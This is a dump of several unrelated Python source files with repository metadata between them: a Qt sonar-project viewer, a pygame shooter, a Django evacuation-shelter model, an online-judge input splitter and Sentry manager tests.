mfile = QtWidgets.QTreeWidgetItem(['multibeam files'])
l1 = QtWidgets.QTreeWidgetItem(mfile)
self.mfile_table = MultibeamTable(self.dashboard_data['multibeam_files'])
self.tree.setItemWidget(l1, 0, self.mfile_table)
self.tree.addTopLevelItem(mfile)
sstatus = QtWidgets.QTreeWidgetItem(['sounding status'])
l2 = QtWidgets.QTreeWidgetItem(sstatus)
self.soundingstatus_table = StatusTable(self.dashboard_data['sounding_status'])
self.tree.setItemWidget(l2, 0, self.soundingstatus_table)
self.tree.addTopLevelItem(sstatus)
lrun = QtWidgets.QTreeWidgetItem(['last run process'])
l3 = QtWidgets.QTreeWidgetItem(lrun)
self.lastrun_table = LastRunTable(self.dashboard_data['last_run'])
self.tree.setItemWidget(l3, 0, self.lastrun_table)
self.tree.addTopLevelItem(lrun)
self.vlayout.addWidget(self.tree)
self.setLayout(self.vlayout)
class KlusterProjectView(QtWidgets.QWidget):
"""
QTableWidget to display the data from an fqpr_intelligence IntelModule.
"""
file_added = QtCore.Signal(str)
def __init__(self, parent=None, *args, **kwargs):
super().__init__(*args, **kwargs)
self.parent = parent
self.project_file = None
self.project = None
self.loaded_fqpr_views = []
self.loaded_collapsible = []
self.mainlayout = QtWidgets.QVBoxLayout()
self.hlayout = QtWidgets.QHBoxLayout()
self.fil_text = QtWidgets.QLineEdit('')
self.fil_text.setMinimumWidth(400)
self.fil_text.setReadOnly(True)
self.hlayout.addWidget(self.fil_text)
self.newproj_button = QtWidgets.QPushButton("New Project")
self.hlayout.addWidget(self.newproj_button)
self.openproj_button = QtWidgets.QPushButton("Open Project")
self.hlayout.addWidget(self.openproj_button)
self.mainlayout.addLayout(self.hlayout)
scroll = QtWidgets.QScrollArea()
scroll.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
scroll_content = QtWidgets.QWidget()
scroll_layout = QtWidgets.QVBoxLayout(scroll_content)
scroll_content.setLayout(scroll_layout)
self.datalayout = QtWidgets.QVBoxLayout()
scroll_layout.addLayout(self.datalayout)
scroll.setWidget(scroll_content)
scroll.setWidgetResizable(True)
self.mainlayout.addWidget(scroll)
self.setLayout(self.mainlayout)
self.setMinimumSize(1000, 600)
self.newproj_button.clicked.connect(self.new_project)
self.openproj_button.clicked.connect(self.open_project)
def _load_from_project(self):
"""
Build out the gui from the loaded project. Each fqpr instance gets it's own collapsible section
"""
for fqpr_name, fqpr_inst in self.project.fqpr_instances.items():
fqprview = KlusterFqprView(self, fqpr_inst)
new_expand = CollapsibleWidget(self, fqpr_name, 100, set_expanded_height=800)
new_layout = QtWidgets.QVBoxLayout()
new_layout.addWidget(fqprview)
new_expand.setContentLayout(new_layout)
self.datalayout.addWidget(new_expand)
self.loaded_fqpr_views.append(fqprview)
self.loaded_collapsible.append(new_expand)
self.datalayout.addStretch()
self.datalayout.layout()
def new_project(self):
"""
Get the file path to a new project
"""
# dirpath will be None or a string
msg, pth = RegistryHelpers.GetFilenameFromUserQT(self, RegistryKey='klusterintel', Title='Create a new Kluster project',
AppName='klusterintel', fFilter="*.json", bSave=True,
DefaultFile='kluster_project.json')
if pth:
# the project name is mandatory, just so that we can find it later, I ask for a file path for the project
# file and override the filename, kind of messy but works for now
if os.path.exists(pth):
os.remove(pth)
directory, filename = os.path.split(pth)
project_file = os.path.join(directory, 'kluster_project.json')
self.fil_text.setText(project_file)
self.project_file = project_file
self.project = FqprProject(is_gui=True)
self.project.new_project_from_directory(directory)
if self.parent:
self.parent.set_project(self.project)
self._load_from_project()
def open_project(self):
"""
Get the file path to a new project
"""
# dirpath will be None or a string
msg, pth = RegistryHelpers.GetFilenameFromUserQT(self, RegistryKey='klusterintel', Title='Open an existing Kluster project',
AppName='klusterintel', fFilter="*.json", bSave=False)
if pth:
self.fil_text.setText(pth)
self.build_from_project(pth)
def close_project(self):
self.fil_text.setText('')
self.project = None
if self.parent:
self.parent.set_project(self.project)
def build_from_project(self, project_path: str):
"""
Load from a new project file, will close the active project and repopulate the gui
Parameters
----------
project_path
path to a kluster project, kluster_project.json file
"""
if os.path.exists(project_path):
self.clear_project()
self.project_file = project_path
self.project = FqprProject(is_gui=True)
self.project.open_project(self.project_file, skip_dask=True)
if self.parent:
self.parent.set_project(self.project)
self._load_from_project()
print('Loaded {}'.format(project_path))
else:
print('Unable to load from file, does not exist: {}'.format(project_path))
def clear_project(self):
"""
Clear the datalayout layout widget
"""
clear_layout(self.datalayout)
def clear_layout(data_layout: QtWidgets.QLayout):
"""
Delete all widgets in a layout
Parameters
----------
data_layout
layout we want to clear
"""
while data_layout.count():
child = data_layout.takeAt(0)
if child.widget() is not None:
child.widget().deleteLater()
elif child.layout() is not None:
clear_layout(child.layout())
class OutWindow(QtWidgets.QMainWindow):
"""
Simple Window for viewing the KlusterProjectTree for testing
"""
def __init__(self, parent=None):
super().__init__(parent)
self.top_widget = QtWidgets.QWidget()
self.setCentralWidget(self.top_widget)
layout = QtWidgets.QHBoxLayout()
self.top_widget.setLayout(layout)
self.k_view = KlusterProjectView()
self.k_view.setObjectName('kluster_projectview')
layout.addWidget(self.k_view)
layout.layout()
self.setLayout(layout)
self.centralWidget().setLayout(layout)
self.show()
if __name__ == '__main__':
import sys
try: # pyside2
app = QtWidgets.QApplication()
except TypeError: # pyqt5
app = QtWidgets.QApplication([])
test_window = OutWindow()
test_window.show()
sys.exit(app.exec_()) | [
"eyou102@gmail.com"
] | eyou102@gmail.com |
c5e5d2eb663a879d134533e2f810404fcb78ea02 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2560/60793/234058.py | e21cf4ae12c04d5d30fecf5c616f73a86565645e | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 17 | py | print(2)
print(6) | [
"1069583789@qq.com"
] | 1069583789@qq.com |
2148a1ec86f693f6250a590af5dd963cab9d67ae | eb4dd92bb28d60b9e967dcf4d3b380a29169774f | /MDRSREID/Settings/parser_args/parser_args.py | 1c60704bbc187c0850cc4ab93193e9a881c82bf0 | [] | no_license | qianqiansbaby/HJL-re-id | b972c441e780fdb83c176405bc644be4a7d48779 | 337de9e06fc43de1388fd719c5dea9d2d71f0df6 | refs/heads/master | 2023-01-10T13:45:02.502919 | 2020-10-15T12:09:52 | 2020-10-15T12:09:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,780 | py | import argparse
def parser_args():
"""
:argument:
--exp_dir
--default_config_path
--ow_config_path
--ow_str
:return:
"""
parser = argparse.ArgumentParser()
parser.add_argument('--model_name',
type=str,
default='MDRS',
help='[Optional] Model Name for experiment directory in current directory if exp_dir is None')
parser.add_argument('--exp_dir',
type=str,
default='D:/weights_results/HJL-ReID/MDRS_ADAM_random_erasing_margin_0.3_market_best', # 'D:/weights_results/HOReID/pre-trained', #
help='[Optional] Directory to store experiment output, '
'including log files and model checkpoint, etc.')
parser.add_argument('--default_config_path',
type=str,
default='D:/Pycharm_Project/HJL-ReID/MDRSREID/Settings/config/default_config.py',
help='A configuration file.')
parser.add_argument('--ow_config_path',
type=str,
default='D:/Pycharm_Project/HJL-ReID/MDRSREID/Settings/config/overwrite_config/MDRS_config_ADAM_best_market1501.txt',
help='[Optional] A text file, each line being an item to overwrite the cfg_file.')
parser.add_argument('--ow_str',
type=str,
default='cfg.dataset.train.name = \'market1501\'',
help="""[Optional] Items to overwrite the cfg_file.
E.g. "cfg.dataset.train.name = \'market1501\''; cfg.model.em_dim = 256" """)
args, _ = parser.parse_known_args()
return args
| [
"nickhuang1996@126.com"
] | nickhuang1996@126.com |
488c48e4070442e1eb23a92e3e1d6d21f7bb8281 | d57b51ec207002e333b8655a8f5832ed143aa28c | /.history/1/PyGame/game_20200606102211.py | f4be514721bb31b6c5b2be71ebbace07010fe7cd | [] | no_license | yevheniir/python_course_2020 | b42766c4278a08b8b79fec77e036a1b987accf51 | a152d400ab4f45d9d98d8ad8b2560d6f0b408c0b | refs/heads/master | 2022-11-15T07:13:24.193173 | 2020-07-11T15:43:26 | 2020-07-11T15:43:26 | 278,890,802 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,736 | py | # 1 - Import library
import pygame
from pygame.locals import *
import math
import random
# 2 - Initialize the game
pygame.init()
width, height = 640, 480
screen=pygame.display.set_mode((width, height))
keys = [False, False, False, False]
playerpos=[100,100]
acc=[0,0]
arrows=[]
badtimer=100
badtimer1=0
badguys=[[640,100]]
healthvalue=194
pygame.mixer.init()
# 3 - Load image
player = pygame.image.load("resources/images/dude.png")
grass = pygame.image.load("resources/images/grass.png")
castle = pygame.image.load("resources/images/castle.png")
arrow = pygame.image.load("resources/images/bullet.png")
badguyimg1 = pygame.image.load("resources/images/badguy.png")
badguyimg=badguyimg1
healthbar = pygame.image.load("resources/images/healthbar.png")
health = pygame.image.load("resources/images/health.png")
gameover = pygame.image.load("resources/images/gameover.png")
youwin = pygame.image.load("resources/images/youwin.png")
# 3.1 - Load audio
hit = pygame.mixer.Sound("resources/audio/explode.wav")
enemy = pygame.mixer.Sound("resources/audio/enemy.wav")
shoot = pygame.mixer.Sound("resources/audio/shoot.wav")
hit.set_volume(0.05)
enemy.set_volume(0.05)
shoot.set_volume(0.05)
pygame.mixer.music.load('resources/audio/moonlight.wav')
pygame.mixer.music.play(-1, 0.0)
pygame.mixer.music.set_volume(0.25)
# 4 - keep looping through
running = 1
exitcode = 0
while running:
badtimer-=1
# 5 - clear the screen before drawing it again
screen.fill(0)
# 6 - draw the player on the screen at X:100, Y:100
for x in range(width//grass.get_width()+1):
for y in range(height//grass.get_height()+1):
screen.blit(grass,(x*100,y*100))
screen.blit(castle,(0,30))
screen.blit(castle,(0,135))
screen.blit(castle,(0,240))
screen.blit(castle,(0,345 ))
# 6.1 - Set player position and rotation
position = pygame.mouse.get_pos()
angle = math.atan2(position[1]-(playerpos[1]+32),position[0]-(playerpos[0]+26))
playerrot = pygame.transform.rotate(player, 360-angle*57.29)
playerpos1 = (playerpos[0]-playerrot.get_rect().width/2, playerpos[1]-playerrot.get_rect().height/2)
screen.blit(playerrot, playerpos1)
# 6.2 - Draw arrows
for bullet in arrows:
index=0
velx=math.cos(bullet[0])*10
vely=math.sin(bullet[0])*10
bullet[1]+=velx
bullet[2]+=vely
if bullet[1]<-64 or bullet[1]>640 or bullet[2]<-64 or bullet[2]>480:
arrows.pop(index)
index+=1
for projectile in arrows:
arrow1 = pygame.transform.rotate(arrow, 360-projectile[0]*57.29)
screen.blit(arrow1, (projectile[1], projectile[2]))
# 6.3 - Draw badgers
if badtimer==0:
badguys.append([640, random.randint(50,430)])
badtimer=100-(badtimer1*2)
if badtimer1>=35:
badtimer1=35
else:
badtimer1+=5
index=0
for badguy in badguys:
if badguy[0]<-64:
badguys.pop(index)
badguy[0]-=5
# 6.3.1 - Attack castle
badrect=pygame.Rect(badguyimg.get_rect())
badrect.top=badguy[1]
badrect.left=badguy[0]
if badrect.left<64:
hit.play()
healthvalue -= random.randint(5,20)
badguys.pop(index)
#6.3.2 - Check for collisions
index1=0
for bullet in arrows:
bullrect=pygame.Rect(arrow.get_rect())
bullrect.left=bullet[1]
bullrect.top=bullet[2]
if badrect.colliderect(bullrect):
enemy.play()
acc[0]+=1
badguys.pop(index)
arrows.pop(index1)
index1+=1
# 6.3.3 - Next bad guy
index+=1
for badguy in badguys:
screen.blit(badguyimg, badguy)
# 6.4 - Draw clock
font = pygame.font.Font(None, 24)
survivedtext = font.render(str((90000-pygame.time.get_ticks())/60000)+":"+str((90000-pygame.time.get_ticks())/1000%60).zfill(2), True, (0,0,0))
textRect = survivedtext.get_rect()
textRect.topright=[635,5]
screen.blit(survivedtext, textRect)
# 6.5 - Draw health bar
screen.blit(healthbar, (5,5))
for health1 in range(healthvalue):
screen.blit(health, (health1+8,8))
# 7 - update the screen
pygame.display.flip()
# 8 - loop through the events
for event in pygame.event.get():
# check if the event is the X button
if event.type==pygame.QUIT:
# if it is quit the game
pygame.quit()
exit(0)
if event.type == pygame.KEYDOWN:
if event.key==K_w:
keys[0]=True
elif event.key==K_a:
keys[1]=True
elif event.key==K_s:
keys[2]=True
elif event.key==K_d:
keys[3]=True
if event.type == pygame.KEYUP:
if event.key==pygame.K_w:
keys[0]=False
elif event.key==pygame.K_a:
keys[1]=False
elif event.key==pygame.K_s:
keys[2]=False
elif event.key==pygame.K_d:
keys[3]=False
if event.type==pygame.MOUSEBUTTONDOWN:
shoot.play()
position=pygame.mouse.get_pos()
acc[1]+=1
arrows.append([math.atan2(position[1]-(playerpos1[1]+32),position[0]-(playerpos1[0]+26)),playerpos1[0]+32,playerpos1[1]+32])
# 9 - Move player
if keys[0]:
playerpos[1]-=5
elif keys[2]:
playerpos[1]+=5
if keys[1]:
playerpos[0]-=5
elif keys[3]:
playerpos[0]+=5
#10 - Win/Lose check
if pygame.time.get_ticks()>=90000:
running=0
exitcode=1
if healthvalue<=0:
running=0
exitcode=0
if acc[1]!=0:
accuracy=acc[0]*1.0/acc[1]*100
else:
accuracy=0
# 11 - Win/lose display
if exitcode==0:
pygame.font.init()
font = pygame.font.Font(None, 24)
text = font.render("Accuracy: "+str(accuracy)+"%", True, (255,0,0))
textRect = text.get_rect()
textRect.centerx = screen.get_rect().centerx
textRect.centery = screen.get_rect().centery+24
screen.blit(gameover, (0,0))
screen.blit(text, textRect)
else:
pygame.font.init()
font = pygame.font.Font(None, 24)
text = font.render("Accuracy: "+str(accuracy)+"%", True, (0,255,0))
textRect = text.get_rect()
textRect.centerx = screen.get_rect().centerx
textRect.centery = screen.get_rect().centery+24
screen.blit(youwin, (0,0))
screen.blit(text, textRect)
while 1:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
exit(0)
pygame.display.flip()
| [
"yevheniira@intelink-ua.com"
] | yevheniira@intelink-ua.com |
34344a8e8eeb096e794f7cd626ca3bc85ad0e7c6 | e14bc49af70260a891f56d2ce739ae005a32c360 | /hello.py | 3ece0382a9abf3407b7163d26cddf98bce84ad27 | [] | no_license | Marist-CMPT120-FA19/Anthony-Gandini-Lab-2 | 72512cd3b625313517bf68ac324e0b86e165c0b4 | 21e18284fbe5666faefe67b55c8373b44651f3f8 | refs/heads/master | 2020-07-20T10:33:40.575232 | 2019-09-05T17:57:28 | 2019-09-05T17:57:28 | 206,625,940 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 57 | py | #Anthony Gandini
#CMPT-120 Lab 2
print("Hello World!");
| [
"unconfigured@null.spigotmc.org"
] | unconfigured@null.spigotmc.org |
3cda84b7006d285ed9ce4c722c48031cff326c35 | 31dfdbde18ea2844895e453e5ee4a854d1ec35e9 | /onlinejudge/_implementation/command/split_input.py | c89385542db4cdc82cf728a6486c97e278548a9c | [
"MIT"
] | permissive | uta8a/online-judge-tools | 1d848f91749c4661c71ec527b18ac79a0b1ca419 | d9f1209c4e986a881181476c039f5051cd42d75d | refs/heads/master | 2020-04-27T07:43:16.882820 | 2019-03-04T13:17:35 | 2019-03-04T13:17:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,025 | py | # Python Version: 3.x
import subprocess
import sys
import time
from typing import *
from typing.io import *
import onlinejudge
import onlinejudge._implementation.logging as log
import onlinejudge._implementation.utils as utils
if TYPE_CHECKING:
import argparse
def non_block_read(fh: IO[Any]) -> str:
# workaround
import fcntl
import os
fd = fh.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
try:
return fh.read()
except:
return ''
split_input_auto_footer = ('__AUTO_FOOTER__', ) # this shouldn't be a string, so a tuple
def split_input(args: 'argparse.Namespace') -> None:
with open(args.input) as fh:
inf = fh.read()
if args.footer == split_input_auto_footer:
args.footer = inf.splitlines(keepends=True)[-1]
with subprocess.Popen(args.command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=sys.stderr) as proc:
index = 0
acc = ''
for line in inf.splitlines(keepends=True):
if args.ignore:
args.ignore -= 1
else:
acc += line
proc.stdin.write(line.encode())
proc.stdin.flush()
time.sleep(args.time)
if non_block_read(proc.stdout): # if output exists
index += 1
path = utils.percentformat(args.output, {'i': str(index)})
log.info('case found: %d', index)
if args.header:
if args.header == args.header.strip():
acc = '\n' + acc
acc = args.header + acc
if args.footer:
acc = acc + args.footer
log.emit(log.bold(acc))
with open(path, 'w') as fh:
fh.write(acc)
log.success('saved to: %s', path)
acc = ''
while non_block_read(proc.stdout): # consume all
pass
| [
"kimiyuki95@gmail.com"
] | kimiyuki95@gmail.com |
de13c219187366afe4cc847fe551db4d7c1b2c32 | 505343f6ace00d22f8753c1a943a5794a619e698 | /katas/Python/6 kyu/Consecutive strings 56a5d994ac971f1ac500003e.py | 1a7200b1a4cf9cbb3c6987b8b4f5039a7fc9099c | [] | no_license | bullet1337/codewars | 7652e50bf768bc47976a9124dd98b93602d4d458 | ba7f13ddd766158b41e036dae5d6b15f7f08761a | refs/heads/master | 2020-03-27T05:04:03.751302 | 2019-04-30T17:45:39 | 2019-04-30T17:45:39 | 145,991,995 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 349 | py | # https://www.codewars.com/kata/56a5d994ac971f1ac500003e
def longest_consec(strarr, k):
if len(strarr) == 0 or not(0 < k <= len(strarr)):
return ''
res = ''.join(strarr[:k])
for i in range(1, len(strarr) - k + 1):
x = ''.join(strarr[i:i + k])
if len(x) > len(res):
res = x
return res
| [
"alichek95@mail.ru"
] | alichek95@mail.ru |
a4f3c184786b0f88401bb53010992e6b905798c5 | 5cf71ff8714bf0568394717c6176f371f929555d | /mizql/evacuation/models.py | e0176faf3d9cd45055e5c14d034afab27c9b873e | [
"MIT"
] | permissive | StudioAquatan/mizql | 66a9b1a8117dcb1f8dd86c94bb8632e076eb7996 | 340e44266a97dda846fbc17ce0edf85cee586f51 | refs/heads/master | 2020-04-04T13:12:54.361363 | 2018-11-11T06:20:15 | 2018-11-11T06:20:15 | 155,953,069 | 0 | 0 | MIT | 2020-03-15T09:21:09 | 2018-11-03T05:23:07 | JavaScript | UTF-8 | Python | false | false | 4,607 | py | from django.db import models
from django.contrib.auth import get_user_model
from django.db.models.expressions import RawSQL
from django.utils import timezone
class NearbyShelterManager(models.Manager):
def with_distance(self, lat: float, lon: float):
"""
Shelterクエリセットに対してdistanceカラムを追加する
:param lat:
:param lon:
:return:
"""
raw_queryset = self.get_queryset()
# 距離を計算するクエリ
query = """
6371 * acos(
cos(radians(%s)) * cos(radians(lat)) * cos(radians(lon) - radians(%s))
+ sin(radians(%s)) * sin(radians(lat))
)
"""
# 計算したdistanceフィールドをannotate
queryset = raw_queryset.annotate(distance=RawSQL(query, (lat, lon, lat)))
return queryset
def get_nearby_shelters_list(self, lat: float, lon: float, distance: int):
"""
自身の緯度経度から範囲を指定して避難所の情報一覧を取得する
:param lat: 自身の緯度
:param lon: 自身の経度
:param distance: 取得する半径(メートル)
:return: queryset
"""
queryset = self.with_distance(lat, lon)
# キロメートルに変換
distance = distance / 1000
# distanceの内容でフィルタ
return queryset.filter(distance__lte=distance)
class Shelter(models.Model):
"""
避難所のモデル
"""
name = models.CharField(verbose_name='名前', max_length=255)
address = models.CharField(verbose_name='住所', max_length=255)
lat = models.FloatField(verbose_name='緯度')
lon = models.FloatField(verbose_name='経度')
capacity = models.IntegerField('収容可能人数', null=True)
objects = NearbyShelterManager()
class Meta:
unique_together = ('lat', 'lon')
ordering = ['name']
def __str__(self):
return self.name
class PersonalEvacuationHistory(models.Model):
"""
個人の避難履歴を取る
"""
user = models.ForeignKey(get_user_model(), verbose_name='ユーザ', on_delete=models.CASCADE,
related_name='evacuation_histories')
shelter = models.ForeignKey(Shelter, verbose_name='避難所', on_delete=models.CASCADE,
related_name='personal_histories')
created_at = models.DateTimeField('日付')
is_evacuated = models.BooleanField(verbose_name='避難しているか')
class Meta:
ordering = ['-created_at']
class EvacuationHistoryManager(models.Manager):
def create(self, shelter: Shelter, now=None):
"""
10分前から現在までの避難人数を取得
:param shelter:
:param now: 時刻
:return:
"""
if now is None:
now = timezone.now()
latest_date = now
latest_count = 0
# 最新の履歴から人数を取得
personal_histories = PersonalEvacuationHistory.objects.filter(shelter=shelter)
latest_history = EvacuationHistory.objects.filter(shelter=shelter).order_by('-created_at').first()
if latest_history is not None:
latest_count = latest_history.count
latest_date = latest_history.created_at
else:
last_history = personal_histories.order_by('-created_at').first()
if last_history is not None:
latest_date = last_history.created_at
# 前回取得時意向の履歴一覧
personal_histories = personal_histories.filter(created_at__range=[latest_date, now])
# 避難した人数
at_shelter_count = personal_histories.filter(is_evacuated=True).count()
# 帰宅した人数
at_home_count = personal_histories.filter(is_evacuated=False).count()
# 現在避難所に居る人数
current_count = latest_count + at_shelter_count - at_home_count
hist = self.model(shelter=shelter, count=current_count, created_at=now)
hist.save()
return hist
class EvacuationHistory(models.Model):
"""
避難人数の履歴を取る
"""
shelter = models.ForeignKey(Shelter, verbose_name='避難所', related_name='histories', on_delete=models.CASCADE)
count = models.IntegerField('避難している人数')
is_demo = models.BooleanField('デモ用', default=True)
created_at = models.DateTimeField('取得日')
objects = EvacuationHistoryManager()
class Meta:
ordering = ['-created_at']
| [
"s.kokuryo@gmail.com"
] | s.kokuryo@gmail.com |
93f6d14be8a72f664582b72967e13fe6d8809e82 | b32203aee03e22c29993b5c69ac263638927d550 | /tests/sentry/manager/tests.py | db652c22842af8804da57cfbb7ce710bd0c7fea8 | [
"BSD-2-Clause"
] | permissive | allanlei/sentry | 98d1d23b5827364a686ec0779e80e376bf81a57e | 888b8df0372d6d89dfe076bc025287785bcd1eee | refs/heads/master | 2020-12-25T01:30:29.651370 | 2013-01-04T19:41:50 | 2013-01-04T19:41:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,738 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import datetime
import mock
import pytest
from django.utils import timezone
from sentry.interfaces import Interface
from sentry.manager import get_checksum_from_event
from sentry.models import Event, Group, Project, MessageCountByMinute, ProjectCountByMinute, \
SearchDocument
from sentry.utils.db import has_trending # NOQA
from sentry.testutils import TestCase
class DummyInterface(Interface):
def __init__(self, baz):
self.baz = baz
class SentryManagerTest(TestCase):
@mock.patch('sentry.models.SearchDocument.objects.index')
def test_broken_search_index(self, index):
index.side_effect = Exception()
event = Group.objects.from_kwargs(1, message='foo')
self.assertEquals(event.message, 'foo')
self.assertEquals(event.project_id, 1)
@mock.patch('sentry.signals.regression_signal.send')
def test_broken_regression_signal(self, send):
send.side_effect = Exception()
event = Group.objects.from_kwargs(1, message='foo')
self.assertEquals(event.message, 'foo')
self.assertEquals(event.project_id, 1)
def test_invalid_project(self):
self.assertRaises(Project.DoesNotExist, Group.objects.from_kwargs, 2, message='foo')
def test_valid_only_message(self):
event = Group.objects.from_kwargs(1, message='foo')
self.assertEquals(event.group.last_seen, event.datetime)
self.assertEquals(event.message, 'foo')
self.assertEquals(event.project_id, 1)
def test_valid_timestamp_without_tz(self):
# TODO: this doesnt error, but it will throw a warning. What should we do?
with self.Settings(USE_TZ=True):
date = datetime.datetime.utcnow()
event = Group.objects.from_kwargs(1, message='foo', timestamp=date)
self.assertEquals(event.message, 'foo')
self.assertEquals(event.project_id, 1)
self.assertEquals(event.datetime, date.replace(tzinfo=timezone.utc))
def test_url_filter(self):
event = Group.objects.from_kwargs(1, message='foo')
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='url').count(), 0)
event = Group.objects.from_kwargs(1, message='foo', **{
'sentry.interfaces.Http': {
'url': 'http://example.com',
}
})
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='url').count(), 1)
res = group.messagefiltervalue_set.filter(key='url').get()
self.assertEquals(res.value, 'http://example.com')
self.assertEquals(res.times_seen, 1)
event = Group.objects.from_kwargs(1, message='foo', **{
'sentry.interfaces.Http': {
'url': 'http://example.com',
}
})
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='url').count(), 1)
res = group.messagefiltervalue_set.filter(key='url').get()
self.assertEquals(res.value, 'http://example.com')
self.assertEquals(res.times_seen, 2)
event = Group.objects.from_kwargs(1, message='foo', **{
'sentry.interfaces.Http': {
'url': 'http://example.com/2',
}
})
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='url').count(), 2)
results = list(group.messagefiltervalue_set.filter(key='url').order_by('id'))
res = results[0]
self.assertEquals(res.value, 'http://example.com')
self.assertEquals(res.times_seen, 2)
res = results[1]
self.assertEquals(res.value, 'http://example.com/2')
self.assertEquals(res.times_seen, 1)
def test_server_name_filter(self):
event = Group.objects.from_kwargs(1, message='foo')
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='server_name').count(), 0)
event = Group.objects.from_kwargs(1, message='foo', server_name='foo')
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='server_name').count(), 1)
res = group.messagefiltervalue_set.filter(key='server_name').get()
self.assertEquals(res.value, 'foo')
self.assertEquals(res.times_seen, 1)
event = Group.objects.from_kwargs(1, message='foo', server_name='foo')
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='server_name').count(), 1)
res = group.messagefiltervalue_set.filter(key='server_name').get()
self.assertEquals(res.value, 'foo')
self.assertEquals(res.times_seen, 2)
event = Group.objects.from_kwargs(1, message='foo', server_name='bar')
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='server_name').count(), 2)
results = list(group.messagefiltervalue_set.filter(key='server_name').order_by('id'))
res = results[0]
self.assertEquals(res.value, 'foo')
self.assertEquals(res.times_seen, 2)
res = results[1]
self.assertEquals(res.value, 'bar')
self.assertEquals(res.times_seen, 1)
@mock.patch('sentry.manager.send_group_processors', mock.Mock())
@mock.patch('sentry.manager.GroupManager.add_tags')
def test_tags_as_list(self, add_tags):
event = Group.objects.from_kwargs(1, message='foo', tags=[('foo', 'bar')])
group = event.group
add_tags.assert_called_once_with(group, [('foo', 'bar'), ('logger', 'root'), ('level', 'error')])
@mock.patch('sentry.manager.send_group_processors', mock.Mock())
@mock.patch('sentry.manager.GroupManager.add_tags')
def test_tags_as_dict(self, add_tags):
event = Group.objects.from_kwargs(1, message='foo', tags={'foo': 'bar'})
group = event.group
add_tags.assert_called_once_with(group, [('foo', 'bar'), ('logger', 'root'), ('level', 'error')])
@mock.patch('sentry.manager.send_group_processors', mock.Mock())
def test_platform_is_saved(self):
event = Group.objects.from_kwargs(1, message='foo', platform='python')
group = event.group
self.assertEquals(group.platform, 'python')
self.assertEquals(event.platform, 'python')
def test_dupe_message_id(self):
event = Group.objects.from_kwargs(1, event_id=1, message='foo')
self.assertEquals(event.message, 'foo')
self.assertEquals(event.project_id, 1)
self.assertEquals(Event.objects.count(), 1)
# ensure that calling it again doesnt raise a db error
Group.objects.from_kwargs(1, event_id=1, message='foo')
self.assertEquals(Event.objects.count(), 1)
def test_does_update_messagecountbyminute(self):
event = Group.objects.from_kwargs(1, message='foo')
inst = MessageCountByMinute.objects.filter(group=event.group)
self.assertTrue(inst.exists())
inst = inst.get()
self.assertEquals(inst.times_seen, 1)
event = Group.objects.from_kwargs(1, message='foo')
inst = MessageCountByMinute.objects.get(group=event.group)
self.assertEquals(inst.times_seen, 2)
def test_does_update_projectcountbyminute(self):
event = Group.objects.from_kwargs(1, message='foo')
inst = ProjectCountByMinute.objects.filter(project=event.project)
self.assertTrue(inst.exists())
inst = inst.get()
self.assertEquals(inst.times_seen, 1)
event = Group.objects.from_kwargs(1, message='foo')
inst = ProjectCountByMinute.objects.get(project=event.project)
self.assertEquals(inst.times_seen, 2)
def test_updates_group(self):
Group.objects.from_kwargs(1, message='foo', checksum='a' * 32)
event = Group.objects.from_kwargs(1, message='foo bar', checksum='a' * 32)
group = Group.objects.get(pk=event.group_id)
self.assertEquals(group.times_seen, 2)
self.assertEquals(group.last_seen.replace(microsecond=0), event.datetime.replace(microsecond=0))
self.assertEquals(group.message, 'foo bar')
def test_add_tags(self):
event = Group.objects.from_kwargs(1, message='rrr')
group = event.group
Group.objects.add_tags(group, tags=(('foo', 'bar'), ('foo', 'baz'), ('biz', 'boz')))
self.assertEquals(group.messagefiltervalue_set.filter(key='foo').count(), 2)
results = list(group.messagefiltervalue_set.filter(key='foo').order_by('id'))
res = results[0]
self.assertEquals(res.value, 'bar')
self.assertEquals(res.times_seen, 1)
res = results[1]
self.assertEquals(res.value, 'baz')
self.assertEquals(res.times_seen, 1)
self.assertEquals(group.messagefiltervalue_set.filter(key='biz').count(), 1)
results = list(group.messagefiltervalue_set.filter(key='biz').order_by('id'))
res = results[0]
self.assertEquals(res.value, 'boz')
self.assertEquals(res.times_seen, 1)
class SearchManagerTest(TestCase):
def test_search(self):
project = Project.objects.all()[0]
group = Group.objects.create(project=project, message='foo', checksum='a' * 32)
doc = SearchDocument.objects.create(
project=project,
group=group,
status=group.status,
total_events=1,
date_added=group.first_seen,
date_changed=group.last_seen,
)
doc.token_set.create(
field='text',
token='foo',
)
results = list(SearchDocument.objects.search(project, query='foo'))
self.assertEquals(len(results), 1)
# This uses a raw query set so we have to check the id
self.assertEquals(results[0].id, doc.id)
@pytest.mark.skipif('not has_trending()')
class TrendsTest(TestCase):
def test_accelerated_works_at_all(self):
now = timezone.now() - datetime.timedelta(minutes=5)
project = Project.objects.all()[0]
group = Group.objects.create(status=0, project=project, message='foo', checksum='a' * 32)
group2 = Group.objects.create(status=0, project=project, message='foo', checksum='b' * 32)
